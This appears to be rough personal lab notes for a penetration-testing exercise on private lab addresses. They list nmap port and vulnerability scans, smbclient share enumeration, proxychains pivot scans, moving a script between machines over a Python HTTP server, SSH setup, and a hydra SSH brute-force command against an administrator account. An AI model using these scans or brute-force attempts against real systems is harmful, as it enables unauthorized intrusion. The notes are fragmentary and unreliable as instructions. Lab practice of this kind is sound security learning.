nmap 192.168.174.129 -p- --min-rate 20000
nmap -sCV 192.168.174.129 
nmap -sV -sC --script=vuln -v 192.168.174.129
smbclient -L \\\\192.168.174.129  
smbclient \\\\192.168.174.129\\ahad34








proxychains nmap -sT -p 1335 192.168.174.129
proxychains nmap -sT -p 80  192.168.174.128

/////
nmap 192.168.174.130 -p- --min-rate 20000 >>ahad1.txt
nmap -sCV 192.168.174.130 >> ahad2.txt  

sudo apt-get install apache2(in vple) if needed 
sudo apt-get install phpmyadmin(in vple) if needed 

python -m http.server 8081 (server2.py ) we will use this script 

////downloding  server2.py from kali server (192.168.174.128)

wget 192.168.174.129:8081/server2.py(IN VPLE)

sudo apt-get install python-pip( in vple)
pip install http
sudo apt-get install python3-pip(IN vple)
python3 server2.py(in vple)
python3 -m http.server 8081 (in vple)

////in vple  for (server2.py) we will blank the ip address for our purpose  



////for ssh 
sudo apt-get install openssh-server(in kali linux)
sudo apt-get install ufw 
sudo ufw allow ssh
sudo service ssh restart 

///// (now if we go to arch /debian or any linux distribution we can login using the below command )
ssh sajib@192.168.174.128


/////now setiing docker 

///setting hydra brute force 
hydra -l administrator -P password.txt -T 20 192.168.174.129 ssh






